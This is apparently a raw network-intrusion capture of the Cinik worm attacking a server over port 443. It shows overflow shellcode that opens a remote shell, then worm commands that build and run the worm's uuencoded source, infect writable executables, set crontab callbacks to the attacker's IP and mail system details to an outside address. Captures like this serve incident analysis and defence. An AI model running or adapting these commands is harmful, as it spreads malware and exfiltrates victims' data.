12/07-14:08:25.877788 163.118.136.26:49035 -> 192.168.20.1:443
TCP TTL:41 TOS:0x60 ID:53109 IpLen:20 DgmLen:526 DF
***AP*** Seq: 0x42F151A7 Ack: 0x1EE80AD Win: 0x1DCE TcpLen: 32
TCP Options (3) => NOP NOP TS: 4497054 24779648
...........N..L...e1C...c.Q......D....T.G{.....Q.2k.....2]..q...
.O....ky..3....d..j.1........oT...i....\......Rh.m..`.....\...oC
.u)Nl....U.n../4/.H,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAA........AAAA....AAAAAAAAAAAA,.w@AAAA........
....AAAAAAAA............H.......................1....w..w..O .O.
....1.....Q1..f......Y1.9.u.f...f9F.t.....1...1..?I..A..1...Q[..
..1.Ph//shh/bin..PS.......
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/07-14:08:25.895819 192.168.20.1:443 -> 163.118.136.26:49035
TCP TTL:64 TOS:0x0 ID:26443 IpLen:20 DgmLen:87 DF
***AP*** Seq: 0x1EE80AD Ack: 0x42F15381 Win: 0x1920 TcpLen: 32
TCP Options (3) => NOP NOP TS: 24779682 4497054
.!....E.h/+.[sd....\V...[..C.3.6.Tb
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/07-14:08:27.417253 192.168.20.1:443 -> 163.118.136.26:49035
TCP TTL:64 TOS:0x0 ID:26444 IpLen:20 DgmLen:87 DF
***AP*** Seq: 0x1EE80AD Ack: 0x42F15381 Win: 0x1920 TcpLen: 32
TCP Options (3) => NOP NOP TS: 24779834 4497054
.!....E.h/+.[sd....\V...[..C.3.6.Tb
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
...
12/07-14:08:28.144680 163.118.136.26:49035 -> 192.168.20.1:443
TCP TTL:41 TOS:0x60 ID:53114 IpLen:20 DgmLen:187 DF
***AP*** Seq: 0x42F153A4 Ack: 0x1EE80E5 Win: 0x1DCE TcpLen: 32
TCP Options (3) => NOP NOP TS: 4497280 24779874
TERM=xterm; export TERM=xterm; export PATH=/usr/bin:/bin:/sbin:/
usr/sbin:$PATH; PATH=/usr/bin:/bin:/sbin:/usr/sbin:$PATH; exec b
ash -i.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/07-14:08:28.155917 192.168.20.1:443 -> 163.118.136.26:49035
TCP TTL:64 TOS:0x0 ID:26446 IpLen:20 DgmLen:87 DF
***AP*** Seq: 0x1EE80E5 Ack: 0x42F1542B Win: 0x1920 TcpLen: 32
TCP Options (3) => NOP NOP TS: 24779908 4497280
bash: no job control in this shell.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/07-14:08:28.167674 192.168.20.1:443 -> 163.118.136.26:49035
TCP TTL:64 TOS:0x0 ID:26447 IpLen:20 DgmLen:63 DF
***AP*** Seq: 0x1EE8108 Ack: 0x42F1542B Win: 0x1920 TcpLen: 32
TCP Options (3) => NOP NOP TS: 24779909 4497280
bash-2.04$
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/07-14:08:28.455900 163.118.136.26:49035 -> 192.168.20.1:443
TCP TTL:41 TOS:0x60 ID:53115 IpLen:20 DgmLen:1270 DF
***AP*** Seq: 0x42F1542B Ack: 0x1EE8108 Win: 0x1DCE TcpLen: 32
TCP Options (3) => NOP NOP TS: 4497312 24779908
rm -rf /tmp/.cinik.c;cat > /tmp/.cinik.uu<< __eof__;.begin 655 .
cinik.c.M+RHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BH
J*BHJ.M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BH*("H@("\`@("\`
@("\`@.M("\`@("\`@("\`@("\`@("\`@("\`@("\`@("\`@("\`@("\`@("\`@(
"\`@("\`@("\`@("\`@.M("\`@("\`@("\`@("\`@("\`@("\`@("H*("H@("\`@
("\`@("\`@(%!E97(M=&\\M<&5E.M NOP NOP TS: 24783383 4500759
O("\`@('P*"0D)"0EC87-E(#!X-#8Z("\`@+R\\@("\`@?\`H)"0D)"6-A.> MR\`O+R\`@+2U\\"@D)"0D)"75N
M"0D)
M"0D)"6EF("AU9'!S97)V97(N;&5N(#P@
M*2!B M"6%D9'-E<2AR8RT^ M*2!I9B\`HPH)"0D)"0D)"7-T
M="!A:6YS="!T M;G8H M)G5D<'-E M96QA>6-L:65N="@F=',L8G5F+'5D<'-E M96%K.PH)"0D)"0D)?0H)"0D)"0E]"@D)"0D)"7T@8G)E86L["@D)"0E
]"@D).> M"7T*"0E]"@E]"@EA=61P7V-L;W-E*"9U9'!S97)V97(I.PH) #"GT*.> \`.> end.> __eof__.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/07-14:09:02.266154 163.118.136.26:49035 -> 192.168.20.1:443
TCP TTL:41 TOS:0x60 ID:53367 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x42F2E25D Ack: 0x1F00467 Win: 0xA9B0 TcpLen: 32
TCP Options (3) => NOP NOP TS: 4500693 24783287
ho 'for i in `/usr/bin/find /usr /var /tmp /home /mnt -type f -p
erm 7 2>/dev/null`'>> /tmp/.cinik.go.echo 'do'>> /tmp/.cinik.go.
echo ' cat /tmp/.cinik > $i'>> /tmp/.cinik.go.echo ' chmod a+x $
i'>> /tmp/.cinik.go.echo ' echo 2 `/bin/date +%H` \* \* \* $i 16
3.118.136.26 \> /dev/null 2\>\&1 | crontab'>> /tmp/.cinik.go.ech
o 'done'>> /tmp/.cinik.go.echo ' '>> /tmp/.cinik.go.echo '# dire
ctoarele mele'>> /tmp/.cinik.go.echo ' '>> /tmp/.cinik.go.echo '
for i in `/usr/bin/find /usr /var /tmp /home /mnt -type d -uid $
myid`'>> /tmp/.cinik.go.echo 'do'>> /tmp/.cinik.go.echo ' cat /t
mp/.cinik > $i/.cinik'>> /tmp/.cinik.go.echo ' chmod a+x $i/.cin
ik'>> /tmp/.cinik.go.echo ' echo 3 `/bin/date +%H` \* \* \* $i/.
cinik 163.118.136.26 \> /dev/null 2\>\&1 | crontab'>> /tmp/.cini
k.go.echo 'done'>> /tmp/.cinik.go.echo ' '>> /tmp/.cinik.go.echo
'echo PROC > /tmp/.cinik.status'>> /tmp/.cinik.go.echo 'cat /pr
oc/cpuinfo >> /tmp/.cinik.status'>> /tmp/.cinik.go.echo 'echo ME
M >> /tmp/.cinik.status'>> /tmp/.cinik.go.echo '/usr/bin/free >>
/tmp/.cinik.status'>> /tmp/.cinik.go.echo 'echo HDD >> /tmp/.ci
nik.status'>> /tmp/.cinik.go.echo '/bin/df -h >> /tmp/.cinik.sta
tus'>> /tmp/.cinik.go.echo 'echo IP >> /tmp/.cinik.status'>> /tm
p/.cinik.go.echo '/sbin/ifconfig >> /tmp/.cinik.status'>> /tmp/.
cinik.go.echo ' '>> /tmp/.cinik.go.echo 'myip=`/sbin/ifconfig et
h0 | head -2 | tail -1 | cut -d: -f2 | cut -d" " -f1`'>> /tmp/.c
inik.go.echo 'mail cinik_worm@yahoo.com
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/07-14:09:02.880907 163.118.136.26:49035 -> 192.168.20.1:443
TCP TTL:41 TOS:0x60 ID:53373 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x42F2DCB5 Ack: 0x1F01015 Win: 0xC050 TcpLen: 32
TCP Options (3) => NOP NOP TS: 4500755 24783349
<![CDATA[
)"6-A.M<V4@,'@T-SH@>R\`O+R\`@+2U\\"@D)"0D)"75N<VEG;F5D(&QO;F<@83
L*"0D).M"0D)<W1R=6-T(&AE861E<B\`J<F,]*'-T<G5C="!H96%D97(@*BEB=68
["@D).M"0D)"6EF("AU9'!S97)V97(N;&5N(#P@<VEZ96]F*'-T<G5C="!H96%D9
7(I.M*2!B<F5A:SL*"0D)"0D):68@*"%U<V5S97\$H<F,M/G-E<2DI('L*"0D)"0
D).M"6%D9'-E<2AR8RT^<V5Q*3L*"0D)"0D)"69O<B\`H83TP.V\$\\3\$E.2U,[
82LK.M*2!I9B\`H<F]U=&5S6V%=+FED(#T](')C+3YI9"D@>PH)"0D)"0D)"7-T<
G5C.M="!A:6YS="!T<SL*"0D)"0D)"0EC:&%R('-R=ELR-39=.PH)"0D)"0D)"6-
O.M;G8H<W)V+#(U-BQR;W5T97-;85TN:7\`I.PH)"0D)"0D)"6%U9'!?<F5L87DH
.M)G5D<'-E<G9E<BPF=',L<W)V+')O=71E<UMA72YP;W)T*3L*"0D)"0D)"0ER.M
96QA>6-L:65N="@F=',L8G5F+'5D<'-E<G9E<BYL96XI.PH)"0D)"0D)"6)R.M96
%K.PH)"0D)"0D)?0H)"0D)"0E]"@D)"0D)"7T@8G)E86L["@D)"0E]"@D).M"7T*
"0E]"@E]"@EA=61P7V-L;W-E*"9U9'!S97)V97(I.PH)<F5T=7)N(#\`[.#"GT*.
]]>
\`.end.__eof__./usr/bin/uudecode -o /tmp/.cinik.c /tmp/.cinik.uu
.gcc -o /tmp/.cinik /tmp/.cinik.c -lcrypto./tmp/.cinik 163.118.1
36.26.echo -e '#!/bin/bash..##.## CiNIK starts here :).##..expo
rt PATH=/bin:/sbin:/usr/bin:/usr/sbin:$PATH..# ce id am ?.' > /t
mp/.cinik.go.echo -e 'myid=`/usr/bin/id | /bin/cut -d\( -f1 | /b
in/cut -d= -f2`..# punem si intr-un loc default.mkdir -p /tmp/.f
ont-unix/.cinik.cat /tmp/.cinik > /tmp/.font-unix/.cinik/.cinik'
>> /tmp/.cinik.go.echo -e 'chmod a+x /tmp/.font-unix/.cinik/.ci
nik.echo 1 `/bin/date +%H` \* \* \* /tmp/.font-unix/.cinik/.cini
k 163.118.136.26 \> /dev/null 2\>\&1 | crontab'>> /tmp/.cinik.go
.echo '# ale altora'>> /tmp/.cinik.go.ec
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/07-14:09:02.967626 192.168.20.1:443 -> 163.118.136.26:49035
TCP TTL:64 TOS:0x0 ID:26733 IpLen:20 DgmLen:63 DF
***AP*** Seq: 0x1F01918 Ack: 0x42F2E805 Win: 0xF338 TcpLen: 32
TCP Options (3) => NOP NOP TS: 24783388 4500759
bash-2.04$
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
12/07-14:09:03.178255 163.118.136.26:49035 -> 192.168.20.1:443
TCP TTL:41 TOS:0x60 ID:53375 IpLen:20 DgmLen:198 DF
***AP*** Seq: 0x42F2E805 Ack: 0x1F01018 Win: 0xC050 TcpLen: 32
TCP Options (3) => NOP NOP TS: 4500784 24783379
-s "$myip" < /tmp/.cinik.status'>> /tmp/.cinik.go.echo 'rm -f /t
mp/.cinik.status'>> /tmp/.cinik.go.chmod a+x /tmp/.cinik.go./tmp
/.cinik.go &.exit.
....
....